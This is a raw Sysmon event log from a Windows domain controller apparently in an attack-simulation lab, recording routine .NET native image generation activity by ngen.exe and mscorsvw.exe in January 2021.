13:23:07.765{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BB-6000-A102-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:07.687{08A6967A-45BB-6000-A002-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9d4-0\System.Security.dll2021-01-14 13:23:07.687 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.124{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BB-6000-A002-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.077{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45BB-6000-A002-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.077{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BB-6000-A002-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.046{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BB-6000-9F02-000000009A01}2816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.015{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45BB-6000-9F02-000000009A01}2816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:07.015{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BB-6000-9F02-000000009A01}2816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:23:08.749{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea78-0x664ff4b7) 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:08.718{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BC-6000-A402-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:08.702{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45BC-6000-A402-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:08.702{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BC-6000-A402-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:08.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BC-6000-A302-000000009A01}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:08.562{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45BC-6000-A302-000000009A01}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:08.562{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BC-6000-A302-000000009A01}5020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:08.484{08A6967A-45BB-6000-A202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\105c-0\System.ServiceModel.Activation.dll2021-01-14 13:23:08.484 11241100x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:10.937{08A6967A-45BE-6000-A602-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10a4-0\System.ServiceModel.Channels.dll2021-01-14 13:23:10.937 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:10.562{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BE-6000-A602-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:10.546{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45BE-6000-A602-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:10.546{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BE-6000-A602-000000009A01}4260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:10.468{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BE-6000-A502-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:10.453{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45BE-6000-A502-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:10.453{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BE-6000-A502-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:10.343{08A6967A-45BC-6000-A402-000000009A01}4156C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\103c-0\System.ServiceModel.Activities.dll2021-01-14 13:23:10.343 10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.968{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BF-6000-A902-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.953{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45BF-6000-A902-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.953{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BF-6000-A902-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:11.875{08A6967A-45BF-6000-A802-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e88-0\System.ServiceModel.Discovery.dll2021-01-14 13:23:11.875 10341000x80000000000000006770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.140{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BF-6000-A802-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYST